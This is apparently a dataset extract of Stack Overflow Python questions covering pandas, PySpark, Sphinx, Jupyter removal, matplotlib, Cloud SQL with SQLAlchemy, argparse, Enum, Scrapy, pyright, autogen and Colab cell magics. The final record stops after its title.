QuestionId
int64
74.8M
79.8M
UserId
int64
56
29.4M
QuestionTitle
stringlengths
15
150
QuestionBody
stringlengths
40
40.3k
Tags
stringlengths
8
101
CreationDate
stringdate
2022-12-10 09:42:47
2025-11-01 19:08:18
AnswerCount
int64
0
44
UserExpertiseLevel
int64
301
888k
UserDisplayName
stringlengths
3
30
77,818,659
13,396,497
Read first two and last rows based on 2 columns
<p>I have a dataframe :</p> <pre><code>dfs = pd.read_csv(StringIO(&quot;&quot;&quot; datetime ID C_1 C_2 C_3 C_4 C_5 C_6 &quot;18/06/2023 3:51:50&quot; 136 101 2024 89 4 3 13 &quot;18/06/2023 3:51:52&quot; 136 101 2028 61 4 3 18 &quot;18/06/2023 3:51:53&quot; 24 101 2029 65 0 0 0 &quot;18/06/2023 3:51:53&quot; 24 102 2022 89 0 0 0 &quot;18/06/2023 3:51:54&quot; 136 102 2045 66 2 3 4 &quot;18/06/2023 3:51:55&quot; 0 101 2022 89 0 0 0 &quot;18/06/2023 3:51:56&quot; 136 101 2222 77 0 0 0 &quot;18/06/2023 3:51:56&quot; 24 102 2022 89 0 0 0 &quot;18/06/2023 3:51:57&quot; 136 101 2024 90 0 0 0 &quot;18/06/2023 3:51:57&quot; 24 101 2026 87 0 1 8 &quot;18/06/2023 3:51:58&quot; 0 102 2045 44 43 42 41 &quot;18/06/2023 3:51:59&quot; 24 102 2043 33 0 1 8 &quot;18/06/2023 3:52:01&quot; 24 101 2022 89 1 4 76 &quot;18/06/2023 3:52:03&quot; 24 102 2046 31 0 1 6 &quot;18/06/2023 3:52:18&quot; 136 101 3333 99 0 1 87 &quot;18/06/2023 3:52:54&quot; 136 102 2045 66 2 3 4 &quot;&quot;&quot;), sep=&quot;\s+&quot;) </code></pre> <p>Is there a way to read first two and last two columns(one for ID=136 and one for ID=24) for every different C_1.</p> <p>I am trying below code it's working as expected, looking for simple and fast solution-</p> <pre><code>filter_1 = dfs['ID'].isin(['136']) filter_2 = dfs['ID'].isin(['24']) test_df1 = dfs.loc[filter_1, :] test_df2 = dfs.loc[filter_2, :] g1 = test_df1.groupby('C_1') g2 = test_df2.groupby('C_1') final_df1 = pd.concat([g1.head(1), g1.tail(1)]).drop_duplicates().sort_values('C_1').reset_index(drop=True) final_df2 = pd.concat([g2.head(1), g2.tail(1)]).drop_duplicates().sort_values('C_1').reset_index(drop=True) #merge final_df1 &amp; final_df2 </code></pre> <p>Output -</p> <pre><code> datetime ID C_1 C_2 C_3 C_4 C_5 C_6 &quot;18/06/2023 3:51:50&quot; 136 101 2024 89 4 3 13 &quot;18/06/2023 3:51:53&quot; 24 101 2029 65 0 0 0 &quot;18/06/2023 3:52:01&quot; 24 101 2022 89 1 4 76 &quot;18/06/2023 3:52:18&quot; 136 101 3333 99 0 1 87 &quot;18/06/2023 3:51:53&quot; 24 102 2022 89 0 0 0 &quot;18/06/2023 3:51:54&quot; 136 102 2045 66 2 3 4 &quot;18/06/2023 3:52:03&quot; 24 102 2046 31 0 1 6 &quot;18/06/2023 3:52:54&quot; 136 102 2045 66 2 3 4 </code></pre>
<python><pandas>
2024-01-15 09:05:22
1
347
RKIDEV
77,818,549
3,909,896
Read value with hidden carriage return in boolean field as boolean
<p>I'm trying to read (dirty) CSV files from a cloud storage with PySpark which have <code>&lt;boolean&gt;\r</code> values at the end of the line sometimes. This is not always the case, the column also contains correct booleans or even nothing (=null).</p> <p>I get a schema from another place which specifies the column types (I have 200+ columns, the one in question is the last one). The column type for the last column is boolean - but since PySpark cannot interpret <code>True\r</code> values as <code>True</code> (same for <code>False\r</code>) I get nulls where I don't want to get nulls.</p> <p>Data example:</p> <pre><code>id,mybool 1,True\r 2,False 3, 4,False\r 5,True 6,True\r </code></pre> <p>How can I ensure that PySpark can interpret the values?</p> <p>I was thinking of editing the schema that I get and change the DataType to String, clean it up and cast it to Boolean, but I was hoping that there is a better way.</p>
<python><csv><pyspark>
2024-01-15 08:44:10
1
3,013
Cribber
77,818,509
1,055,817
ReadTheDocs Sphinx build failing due to version error
<p>I've created a documentation for python library that I released last December. <a href="https://monalysa.readthedocs.io/en/latest/" rel="nofollow noreferrer">https://monalysa.readthedocs.io/en/latest/</a></p> <p>GitHub Repository: <a href="https://github.com/siva82kb/monalysa/tree/main" rel="nofollow noreferrer">https://github.com/siva82kb/monalysa/tree/main</a></p> <p>I've made some changes to the structure of the documentation but the build now fails on ReadTheDocs. Its appears to be an error with the version of Sphinx. I get the following error in the build step.</p> <pre><code>Running Sphinx v4.5.0 loading translations [en]... done Traceback (most recent call last): File &quot;/home/docs/checkouts/readthedocs.org/user_builds/monalysa/envs/latest/lib/python3.9/site-packages/sphinx/registry.py&quot;, line 438, in load_extension metadata = setup(app) File &quot;/home/docs/checkouts/readthedocs.org/user_builds/monalysa/envs/latest/lib/python3.9/site-packages/sphinxcontrib/applehelp/__init__.py&quot;, line 230, in setup app.require_sphinx('5.0') File &quot;/home/docs/checkouts/readthedocs.org/user_builds/monalysa/envs/latest/lib/python3.9/site-packages/sphinx/application.py&quot;, line 393, in require_sphinx raise VersionRequirementError(version) sphinx.errors.VersionRequirementError: 5.0 The above exception was the direct cause of the following exception: Traceback (most recent call last): File &quot;/home/docs/checkouts/readthedocs.org/user_builds/monalysa/envs/latest/lib/python3.9/site-packages/sphinx/cmd/build.py&quot;, line 272, in build_main app = Sphinx(args.sourcedir, args.confdir, args.outputdir, File &quot;/home/docs/checkouts/readthedocs.org/user_builds/monalysa/envs/latest/lib/python3.9/site-packages/sphinx/application.py&quot;, line 219, in __init__ self.setup_extension(extension) File &quot;/home/docs/checkouts/readthedocs.org/user_builds/monalysa/envs/latest/lib/python3.9/site-packages/sphinx/application.py&quot;, line 380, in setup_extension self.registry.load_extension(self, extname) File &quot;/home/docs/checkouts/readthedocs.org/user_builds/monalysa/envs/latest/lib/python3.9/site-packages/sphinx/registry.py&quot;, line 441, in load_extension raise VersionRequirementError( sphinx.errors.VersionRequirementError: The sphinxcontrib.applehelp extension used by this project needs at least Sphinx v5.0; it therefore cannot be built with this version. Sphinx version error: The sphinxcontrib.applehelp extension used by this project needs at least Sphinx v5.0; it therefore cannot be built with this version. </code></pre> <p>I have tried to force the version of Sphinx to 5.0.2 and the version of phinxcontrib.applehelp to be 1.0.7, which was the version that successfully worked in the previous version of the documentation.</p> <p>No matter what versions I put down in the requirements.txt file, I get the same error.</p> <p>What have done wrong? How do I fix this issue?</p>
<python><python-sphinx><read-the-docs>
2024-01-15 08:34:38
1
1,942
siva82kb
77,818,152
11,922,237
How to remove Jupyter + all its components completely (As if it never existed)
<p>After I totally messed up my base (root) environment and the Jupyter installation within, I want to install it from scratch. To do so, I need to remove it entirely from my system. I tried the solutions recommended in <a href="https://stackoverflow.com/questions/33052232/how-to-uninstall-jupyter">this thread</a> but the <code>jupyter</code> command would not stop working and still returned an output.</p> <p>How do I successfully eliminate Jupyter from my system (Linux) and I mean everything:</p> <ul> <li>Jupyter</li> <li>Jupyter Lab</li> <li>All its dependencies</li> <li>All its files, cached/uncached</li> <li>All installed extensions</li> <li>All configurations</li> <li>All kernels</li> <li>All data directories</li> <li>All paths and directories</li> <li>IPython included</li> </ul>
<python><jupyter-notebook><jupyter><jupyter-lab>
2024-01-15 07:12:34
1
1,966
Bex T.
77,817,773
6,676,101
Why would the `plot` method of the `matplotlib` library return an empty list?
<p>I was hoping to make two different plots using <code>matplotlib</code>.</p> <pre class="lang-python prettyprint-override"><code>import matplotlib.pyplot as pltlib import numpy as np x1 = np.arange(1, 5, 0.1) y1 = np.sin(x1) x2 = np.arange(1, 5, 0.1) y2 = np.log10(x2) plot1 = pltlib.plot() plot2 = pltlib.plot(x2, y2) print(type(plot1)) print(plot1) # print(type(plot2)) # print(plot2) </code></pre> <p>Why does the <a href="https://matplotlib.org/stable/api/_as_gen/matplotlib.pyplot.plot.html" rel="nofollow noreferrer"><code>plot</code></a> method return an empty list when a person tries to plot nothing at all? If there is no input data, shouldn't an exception be raised?</p>
<python><matplotlib>
2024-01-15 05:10:15
2
4,700
Toothpick Anemone
77,817,609
10,844,607
Cloud Function can't call PostgreSQL multiple times at once, unless test queries are run first
<p>Edit: The answer to this was a bit complicated. The tl;dr is make sure you do <a href="https://cloud.google.com/functions/docs/samples/functions-tips-lazy-globals#functions_tips_lazy_globals-python" rel="nofollow noreferrer">Lazy Loading</a> properly; many of the variables declared in the code below were declared and set globally, but your global variables should be set to <code>None</code> and only changed in your actual API call!</p> <hr /> <p>I'm going bonkers.</p> <p>Here is my full <code>main.py</code>. It can be run locally via <code>functions-framework --target=api</code> or on Google Cloud directly:</p> <pre class="lang-py prettyprint-override"><code>import functions_framework import sqlalchemy import threading from google.cloud.sql.connector import Connector, IPTypes from sqlalchemy.orm import sessionmaker, scoped_session Base = sqlalchemy.orm.declarative_base() class TestUsers(Base): __tablename__ = 'TestUsers' uuid = sqlalchemy.Column(sqlalchemy.String, primary_key=True) cloud_sql_connection_name = &quot;myproject-123456:asia-northeast3:tosmedb&quot; connector = Connector() def getconn(): connection = connector.connect( cloud_sql_connection_name, &quot;pg8000&quot;, user=&quot;postgres&quot;, password=&quot;redacted&quot;, db=&quot;tosme&quot;, ip_type=IPTypes.PUBLIC, ) return connection def init_pool(): engine_url = sqlalchemy.engine.url.URL.create( &quot;postgresql+pg8000&quot;, username=&quot;postgres&quot;, password=&quot;redacted&quot;, host=cloud_sql_connection_name, database=&quot;tosme&quot; ) engine = sqlalchemy.create_engine(engine_url, creator=getconn) # Create tables if they don't exist Base.metadata.create_all(engine) return engine engine = init_pool() # Prepare a thread-safe Session maker Session = scoped_session(sessionmaker(bind=engine)) print(&quot;Database initialized&quot;) def run_concurrency_test(): def get_user(): with Session() as session: session.query(TestUsers).first() print(&quot;Simulating concurrent reads...&quot;) threads = [] for i in range(2): thread = threading.Thread(target=get_user) threads.append(thread) thread.start() # Wait for all threads to complete for thread in threads: thread.join() print(f&quot;Thread {thread.name} completed&quot;) print(&quot;Test passed - Threads all completed!\n&quot;) run_concurrency_test() @functions_framework.http def api(request): print(&quot;API hit - Calling run_concurrency_test()...&quot;) run_concurrency_test() return &quot;Success&quot; </code></pre> <p><code>requirements.txt</code>: <div class="snippet" data-lang="js" data-hide="true" data-console="false" data-babel="false"> <div class="snippet-code snippet-currently-hidden"> <pre class="snippet-code-js lang-js prettyprint-override"><code>functions-framework==3.* cloud-sql-python-connector[pg8000]==1.5.* SQLAlchemy==2.* pg8000==1.*</code></pre> </div> </div> </p> <p>It's super simple - and it works! As long as you have a PostgreSQL instance, it will create the TestUsers table as needed, query it twice (at the same time via threads!), and every time you curl it, it works as well. Here's some example output:</p> <pre><code>Database initialized Simulating concurrent reads... Thread Thread-4 (get_user) completed Thread Thread-5 (get_user) completed Test passed - Threads all completed! API hit - Calling run_concurrency_test()... Simulating concurrent reads... Thread Thread-7 (get_user) completed Thread Thread-8 (get_user) completed Test passed - Threads all completed! </code></pre> <p><strong>However</strong>, if I comment out the first call to <code>run_concurrency_test()</code> (i.e. the one that's not inside the <code>api(request)</code>), run it and curl, I get this:</p> <pre><code>Database initialized API hit - Calling run_concurrency_test()... Simulating concurrent reads... Thread Thread-4 (get_user) completed </code></pre> <p>It gets stuck! Specifically, it gets stuck at <code>session.query(TestUsers).first()</code>. It didn't get stuck when I ran the concurrency test outside the <code>api()</code> first. To the best of my knowledge, my code is stateless, and thread safe. So what is going on here that makes it suddenly not work?</p>
<python><flask><sqlalchemy><google-cloud-functions><google-cloud-sql>
2024-01-15 03:48:40
2
5,694
Dr-Bracket
77,817,496
4,451,521
argparse with a pair of floats
<p>Is there an elegant way to introduce a pair of floats using argparse?</p> <p>I know I can use both separately and later process them to convert them into a numpy array of two floats, or even I have been suggested to enter the pair as a string and convert them to numbers but both seem ugly and unnecessary.</p> <p>Is there a way to introduce a pair of floats so as later have them as a numpy array?</p> <h3>First way</h3> <pre><code>def parse_arguments(): parser = argparse.ArgumentParser(description='Process two float numbers.') # Define two float arguments parser.add_argument('--number1', type=float, help='Enter the first float number') parser.add_argument('--number2', type=float, help='Enter the second float number') args = parser.parse_args() # Check if both arguments are provided if args.number1 is not None and args.number2 is not None: # Create a numpy array result_array = np.array([args.number1, args.number2]) return result_array else: # Handle the case when one or both arguments are not provided print(&quot;Please provide both float numbers.&quot;) return None </code></pre> <h3>Second way</h3> <pre><code>def parse_arguments(): parser = argparse.ArgumentParser(description='Process two float numbers.') # Define an argument for two float numbers separated by a comma parser.add_argument('--float_numbers', type=str, help='Enter two float numbers separated by a comma (e.g., 1.0,2.5)') args = parser.parse_args() # Check if the argument is provided if args.float_numbers is not None: # Split the string into two floats numbers = [float(x) for x in args.float_numbers.split(',')] # Create a numpy array result_array = np.array(numbers) return result_array else: # Handle the case when the argument is not provided print(&quot;Please provide two float numbers.&quot;) return None </code></pre>
<python><argparse>
2024-01-15 02:59:25
0
10,576
KansaiRobot
77,817,356
10,693,596
How to correctly define a classmethod that accesses a value of a mangled child attribute?
<p>In Python, how do I correctly define a classmethod of a parent class that references an attribute of a child class?</p> <pre class="lang-py prettyprint-override"><code>from enum import Enum class LabelledEnum(Enum): @classmethod def list_labels(cls): return list(l for c, l in cls.__labels.items()) class Test(LabelledEnum): A = 1 B = 2 C = 3 __labels = { 1: &quot;Label A&quot;, 2: &quot;Custom B&quot;, 3: &quot;Custom label for value C + another string&quot;, } print(Test.list_labels()) # expected output # [&quot;Label A&quot;, &quot;Custom B&quot;, &quot;Custom label for value C + another string&quot;] </code></pre> <p>In the code above I expect that <code>Test.list_labels()</code> will correctly print out the labels, however because the <code>__labels</code> dictionary is defined with the double underscore, I cannot access it correctly.</p> <p>The reason I wanted to have double underscore is to make sure that the labels would not show up when iterating over the enumerator, e.g. list(Test) should not show the dictionary containing labels.</p>
<python><enums><python-class>
2024-01-15 01:59:08
3
16,692
SultanOrazbayev
77,817,085
2,249,815
Python 3.X exec + compile - pass command line arguments
<p>I see answers on how to pass command line arguments to exec but not if compile is nestled inside.</p> <p>Provided with the code:</p> <pre><code>filename = 'C:\\temp\\script.py' exec(compile(open(filename).read(),filename, 'exec')) </code></pre> <p><strong>How can I pass command line arguments or input to the calling code?</strong></p> <hr /> <p>Additional context (you don't have to read):</p> <p>A program called Blender has a built-in text editor / interpreter. And I want to inject code using the statement above. I tried using exec by itself without success. That's why I need exec and compile together. Code structure looks like this:</p> <pre><code>import bpy # Create a new material mat_ref = bpy.data.materials.new(&quot;Mat for joined object&quot;) # Use shader nodes to render the material mat_ref.use_nodes = True nodes = mat_ref.node_tree.nodes # Start from fresh state mat_ref.node_tree.links.clear() mat_ref.node_tree.nodes.clear() # Create the Shader nodes node_diffuse = nodes.new( type = 'ShaderNodeBsdfDiffuse' ) node_matoutput = nodes.new( type = 'ShaderNodeOutputMaterial' ) node_voronoi = nodes.new( type = 'ShaderNodeTexVoronoi' ) # Link the shader nodes mat_ref.node_tree.links.new( node_diffuse.outputs['BSDF'], node_matoutput.inputs['Surface'] ) mat_ref.node_tree.links.new( node_voronoi.outputs['Distance'], node_matoutput.inputs['Displacement'] ) # Change properties of shader nodes mat_ref.node_tree.nodes[&quot;Voronoi Texture&quot;].inputs[2].default_value = 300 </code></pre>
<python><python-3.x><blender>
2024-01-14 23:34:59
1
4,653
Jebathon
77,816,808
9,582,542
Scrapy Collecting Data From Table
<p>I dont get errors from the script below but this script returns no data. I am trying to get all the games for each of the weeks which start in table 4 in the html. When I enter the xpath commands in the scrapy shell I get data but once I put in the parse definition I dont get anything in return.</p> <pre><code>import scrapy class NFLOddsSpider(scrapy.Spider): name = 'NFLOdds' allowed_domains = ['www.sportsoddshistory.com'] start_urls = ['https://www.sportsoddshistory.com/nfl-game-season/?y=2022'] def parse(self, response): for row in response.xpath('//table[@class=&quot;soh1&quot;]//tbody/tr'): day = row.xpath('td[1]//text()').extract_first() date = row.xpath('td[2]//text()').extract_first() time = row.xpath('td[3]//text()').extract_first() AtFav = row.xpath('td[4]//text()').extract_first() favorite = row.xpath('td[5]//text()').extract_first() score = row.xpath('td[6]//text()').extract_first() spread = row.xpath('td[7]//text()').extract_first() AtDog = row.xpath('td[8]//text()').extract_first() underdog = row.xpath('td[9]//text()').extract_first() OvUn = row.xpath('td[10]//text()').extract_first() notes = row.xpath('td[11]//text()').extract_first() week = row.xpath('//*[@id=&quot;content&quot;]/div/table[4]/tbody/tr/td/h3').extract_first() oddsTable = { 'day': day, 'date': date, 'time': time, 'AtFav': AtFav, 'favorite': favorite, 'score': score, 'spread': spread, 'AtDog': AtDog, 'underdog': underdog, 'OvUn': OvUn, 'notes': notes, 'week' : week } yield oddsTable </code></pre>
<python><scrapy>
2024-01-14 21:45:59
2
690
Leo Torres
77,816,676
6,753,182
Is it possible to immediately interrupt the AsyncIO event loop upon task completion?
<p>Take a look at the following simple program:</p> <pre class="lang-py prettyprint-override"><code>import asyncio def callback(_): loop = asyncio.get_running_loop() loop.stop() async def echo(msg): print(msg) async def main(): loop = asyncio.get_running_loop() taskA = loop.create_task(echo(&quot;TaskA&quot;)) taskA.add_done_callback(callback) taskB = loop.create_task(echo(&quot;TaskB&quot;)) await taskB asyncio.run(main()) </code></pre> <p>Currently it outputs</p> <pre><code>TaskA TaskB </code></pre> <p>To me this means that the callback calling <code>loop.stop()</code> will be scheduled on the event loop using something semantically similar to <code>loop.call_soon(callback(taskA))</code> instead of being run immediately after <code>TaskA</code> completes.</p> <p>Is there a different mechanism that interrupts the event loop <em>immediately</em> after a task finishes without explicitly waiting for this task elsewhere? Alternatively, is there a way to hook into the event loop and run some logic every time it changes between concurrently running tasks?</p> <p>My goal is to create a debugging mechanism that will monitor a task and immediately interrupt the event loop when an uncaught exception is raised. The reason I want this to happen immediately instead of when I <code>await tracked_task</code> is because I want to preserve the current shared state of the task so that I may inspect it in a debugger.</p>
<python><python-asyncio><event-loop>
2024-01-14 20:57:05
1
3,290
FirefoxMetzger
77,816,072
998,248
How does pyright retain argument type information with `partial`?
<p>Take this simple example</p> <pre class="lang-py prettyprint-override"><code>from functools import partial def foo(a: str, b: int, c: float, d:str) -&gt; bool: print(a, b, c, d) return True bar = partial(foo, 'a', 1, 2.0) bar() # error </code></pre> <p>Pyright can correctly identify that <code>bar</code> needs another argument named <code>d</code> of type <code>str</code>, but how? I looked at both the actual definition of partial (in python 3.8 - 3.10) and the typeshed types. The actual definition has no types of course, but this is what my typeshed partial definition looks like</p> <pre class="lang-py prettyprint-override"><code>class partial(Generic[_T]): @property def func(self) -&gt; Callable[..., _T]: ... @property def args(self) -&gt; tuple[Any, ...]: ... @property def keywords(self) -&gt; dict[str, Any]: ... def __new__(cls, __func: Callable[..., _T], *args: Any, **kwargs: Any) -&gt; Self: ... def __call__(__self, *args: Any, **kwargs: Any) -&gt; _T: ... if sys.version_info &gt;= (3, 9): def __class_getitem__(cls, item: Any) -&gt; GenericAlias: ... </code></pre> <p>Nothing about that definition should be preserving the types because it just uses <code>Any</code> and <code>...</code> in place of args. You can even copy it out, rename it to <code>mypartial</code>, try to use it and observe that you don't get the same type safety. My understanding is that you might be able to preserve the type information with <code>ParamSpec</code> but that isn't being used here and my version of Python can't access it anyway.</p> <p>Am I missing something or does Pyright just hard code knowledge about what certain things should be, regardless of the types?</p>
<python><python-typing><pyright>
2024-01-14 17:43:32
1
2,791
Anthony Naddeo
77,815,953
17,835,120
Autogen connecting to config file errors
<p>Errors connecting to config files for models using autogen, seems to be dependent on the python code I am executing.</p> <p>My goal is to have one config file that will work for any autogen project.</p> <p>I'm able to get execute a basic conversation between <code>assistant</code> and <code>user_proxy</code> a but adapting the python script to <code>autoagent</code> triggers this error:</p> <pre><code> docker run -it --rm autogen-project Traceback (most recent call last): File &quot;autogen_agentbuilder.py&quot;, line 6, in &lt;module&gt; config_list = autogen.config_list_from_json(config_path) File &quot;/usr/local/lib/python3.8/site-packages/autogen/oai/openai_utils.py&quot;, line 458, in config_list_from_json with open(config_list_path) as json_file: FileNotFoundError: [Errno 2] No such file or directory: 'OAI_CONFIG_LIST.json' </code></pre> <p>To better isolate the issue, I ran the code in docker (thinking this will reduce any errors triggered by my computer)</p> <p>I used code provided in two demos on you tube. The <a href="https://www.youtube.com/watch?v=Cgl9HkbZe5s" rel="nofollow noreferrer">first demo</a> was to get assistant and user_proxy write some code inside of docker. I followed implementation of this code step by step and it worked.</p> <p>But then I tried to use the same setup with some adapted <a href="https://mer.vin/2023/12/autobuilder/" rel="nofollow noreferrer">code</a> from <a href="https://www.youtube.com/watch?v=pIo7sQ-7jyk&amp;t=186s" rel="nofollow noreferrer">another demo to run AgentBuilder</a>() and this failed.</p> <p>Since the second code had a bit of a different setup.</p> <p>Working.py</p> <pre><code> import autogen # import OpenAI API key config_list = autogen.config_list_from_json(env_or_file=&quot;OAI_CONFIG_LIST&quot;) # create the assistant agent assistant = autogen.AssistantAgent( name=&quot;assistant&quot;, llm_config={&quot;config_list&quot;: config_list} ) # Create the user proxy agent user_proxy = autogen.UserProxyAgent( name=&quot;UserProxy&quot;, code_execution_config={&quot;work_dir&quot;: &quot;results&quot;} ) # Start the conversation user_proxy.initiate_chat( assistant, message=&quot;Write a code to print odd numbers from 2 to 100.&quot; ) </code></pre> <p>OAI_CONFIG_LIST</p> <pre><code>[ { &quot;model&quot;: &quot;gpt-3.5-turbo&quot;, &quot;api_key&quot;: &quot;Ap-12345678912234455&quot; } </code></pre> <p>]</p> <p>Error.py</p> <pre><code> # import OpenAI API key config_list = autogen.config_list_from_json(env_or_file=&quot;OAI_CONFIG_LIST&quot;) **default_llm_config = {'temperature': 0}** # 2. Initializing Builder builder = AgentBuilder(config_path=config_path) # 3. Building agents building_task = &quot;Find a paper on arxiv by programming, and analyze its application in some domain...&quot; agent_list, agent_configs = builder.build(building_task, default_llm_config) # 4. Multi-agent group chat group_chat = autogen.GroupChat(agents=agent_list, messages=[], max_round=12) manager = autogen.GroupChatManager(groupchat=group_chat, llm_config={&quot;config_list&quot;: config_list, **default_llm_config}) agent_list[0].initiate_chat( manager, message=&quot;Find a recent paper about gpt-4 on arxiv...&quot; </code></pre> <p>After the template <a href="https://mer.vin/2023/12/autobuilder/" rel="nofollow noreferrer">code</a> triggered an error related to the config file, I changed tried to adapt the python code to the above so that it would mirror the Working.py, however I still encountered the error. The only thing I changed was the llm model from <code>gpt-3.5-turbo</code> to <code>gpt-4</code> and adding the <code>default_llm_config = {'temperature': 0}</code> to the third line of code in configuration.</p> <pre><code># 1. Configuration config_path = 'OAI_CONFIG_LIST.json' config_list = autogen.config_list_from_json(config_path) **default_llm_config = {'temperature': 0}** </code></pre> <p>then it was changed to mirror the working.py</p> <pre><code># import OpenAI API key config_list = autogen.config_list_from_json(env_or_file=&quot;OAI_CONFIG_LIST&quot;) default_llm_config = {'temperature': 0} </code></pre> <p>OAI_CONFIG_LIST</p> <pre><code>[ { &quot;model&quot;: &quot;gpt-4&quot;, &quot;api_key&quot;: &quot;Ap-12345678912234455&quot; } ] </code></pre> <p>I can't understand why with virtually the same code pulling in the config files values it is triggering an error?</p> <p>SUMMARY</p>
<python><configuration><artificial-intelligence><openai-api><ms-autogen>
2024-01-14 17:06:36
0
457
MMsmithH
77,815,874
4,105,440
Placing images in an already existing matplotlib axis side by side
<p>Starting from an already existing matplotlib figure I added a footer by appending a small axis to the bottom. The idea is to fill this footer with an arbitrary number of logos. I want to place the logos side by side (separated by a user controllable pad parameter) so that they fill the footer in height, thus computing their width so as to maintain the aspect ratio locked.</p> <p>This is a standalone MRE which summarizes my approach</p> <pre class="lang-py prettyprint-override"><code>from matplotlib.image import imread as read_png import matplotlib.cbook as cbook import matplotlib.pyplot as plt import numpy as np from mpl_toolkits.axes_grid1 import make_axes_locatable from matplotlib.offsetbox import AnnotationBbox, OffsetImage fig = plt.figure(1, figsize=(6, 6)) ax = plt.gca() ax.set_axis_off() X, Y = np.meshgrid(np.linspace(-3.0, 3.0, 100), np.linspace(-2.0, 2.0, 100)) Z1 = np.exp(-X**2 - Y**2) Z2 = np.exp(-(X * 10)**2 - (Y * 10)**2) z = Z1 * 30 + 50 * Z2 cs = ax.contourf(X, Y, z, cmap='PuBu_r') ax_divider = make_axes_locatable(ax) ax_footer = ax_divider.append_axes( &quot;bottom&quot;, size=&quot;10%&quot;, pad=0.1) ax_footer.set_axis_off() def add_logo(ax, logo, zoom, pos): img_logo = OffsetImage(read_png(logo), zoom=zoom) logo_ann = AnnotationBbox( img_logo, pos, xycoords='axes fraction', frameon=False, box_alignment=(0, 0.25)) at = ax.add_artist(logo_ann) return at add_logo(ax_footer, cbook.get_sample_data('grace_hopper.jpg'), zoom=0.07, pos=(0, 0)) add_logo(ax_footer, cbook.get_sample_data('grace_hopper.jpg'), zoom=0.07, pos=(0.2, 0)) plt.show() </code></pre> <p>which produces</p> <p><a href="https://i.sstatic.net/oyvLL.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/oyvLL.png" alt="enter image description here" /></a></p> <p>However I have to explicitly set up <code>zoom</code> and <code>pos</code> so that the figures occupy the right space. Is there a way to automatically compute these parameters so that the figures are automatically placed next to each other and they fill the footer axis? Or maybe there is a better approach to that?</p> <p>I saw many examples defining a subplots with different rows and columns to place the figures but I already have the axis. I haven't found any way to split an already existing axis into an arbitrary number of inset axes of the same width.</p> <p>-------- EDIT --------------</p> <p>Expanding on the amazing answer of Jody Klymak this is my &quot;final&quot; version. Once you have a generic axis to put the logos in (I still use <code>make_axes_locatable</code> and <code>append_axes</code>) you can just use this function</p> <pre class="lang-py prettyprint-override"><code>def add_logos(ax, logos, x_padding=10): left = 0 for _, logo in enumerate(logos): imdata = read_png(logo) w = imdata.shape[1] h = imdata.shape[0] ax.imshow(imdata, extent=[left, left + w, 0, h]) left = left + w + x_padding # set the limits, otherwise the focus in on the last image ax.set_xlim(0, left) ax.set_ylim(0, h) # anchor the fixed aspect-ratio axes on the left. ax.set_anchor('W') </code></pre> <p>To be used as</p> <pre class="lang-py prettyprint-override"><code>add_logos(ax_footer, [&quot;../input/logos/Logonuovo.png&quot;, &quot;../input/logos/earth_networks_logo.png&quot;]) </code></pre>
<python><matplotlib>
2024-01-14 16:46:43
1
673
Droid
77,815,745
11,748,924
Preventing multiple runs of a cell in google colaboratory
<p>Here is I define <code>run_once</code> cell magic in order to prevent multiple output in same code in google colaboratory. If it's happen while code is not changed, it will display history output without actual computation like first run.</p> <pre><code>#@title Mendefinisikan Fungsi `run_once` from IPython.core.magic import register_cell_magic from IPython.display import display, HTML from google.colab import output from hashlib import sha1 import time import os @register_cell_magic def run_once(line: str, cell: str): &quot;&quot;&quot; This is a custom cell magic command in order to prevent multiple runs, so the cell must be run once for every runtime. If the cell has already run before, then it will display the history output. Usage: %%run_once &quot;&quot;&quot; try: # Argument of this magic cell is specifying tracker directory tracker_dir = line if len(tracker_dir) == 0: tracker_dir = './.run_once' # Set default if not specified. # Create input-output tracker directory if not os.path.exists(tracker_dir): os.makedirs(tracker_dir) # Get cell id by cell changes with SHA-1 as identifier cell_id = sha1(cell.encode('utf-8')).hexdigest() # Check wether cell_id.html already exists. (Imply the cell already run) if os.path.exists(f'{tracker_dir}/{cell_id}.html'): with open(f'{tracker_dir}/{cell_id}.html', 'r') as file_cell_output: html_output = file_cell_output.read() last_created = time.strftime('%Y-%m-%d %H:%M:%S UTC+00', time.gmtime(os.path.getctime(f'{tracker_dir}/{cell_id}.html'))) print(f'This cell ({cell_id}) already ran before, last run was:', last_created, ', displaying history output...\n') display(HTML(html_output)) return # Execute actual code. exec(cell, globals(), locals()) # After code has executed, it will contains some output. Save it! html_output = output.eval_js('document.getElementById(&quot;output-area&quot;).innerHTML;') with open(f'{tracker_dir}/{cell_id}.html', 'w') as file_cell_output: file_cell_output.write(html_output) # Also save the cell code for archive purpose with open(f'{tracker_dir}/{cell_id}.cell.py', 'w') as file_cell_input: file_cell_input.write(cell) except Exception as e: print(f&quot;run_once error: {str(e)}&quot;) </code></pre> <p>Usage example:</p> <pre><code>%%run_once print(&quot;This is an example of cell that can't be runs multiple times&quot;) </code></pre> <p>But I have problem where it's not a python syntax such as shell command</p> <pre><code>%%run_once !ls current_directory </code></pre> <p>Returning:</p> <pre><code>run_once error: invalid syntax (&lt;string&gt;, line 2) </code></pre> <p>Also it seems doesn't work to define global variable:</p> <pre><code>#CELL A %%run_once myvar = 5 </code></pre> <p>While when I <code>print(myvar)</code> in cell B it will say <code>myvar</code> not defined. But it works vice versa where I define <code>myvar</code> without magic cell <code>run_once</code> in a cell and then print the <code>myvar</code> in a cell that in mode <code>run_once</code></p> <p>I suspect because it's using <code>exec</code>.</p> <p>For more screenshosts about its usage I provide the github link <a href="https://github.com/wawan-ikhwan/run-once-colab" rel="nofollow noreferrer">enter link description here</a></p>
<python><jupyter-notebook><jupyter><google-colaboratory>
2024-01-14 16:09:22
1
1,252
Muhammad Ikhwan Perwira
77,815,725
2,991,243
Unmasking adds an extra whitespace for BPE tokenizer
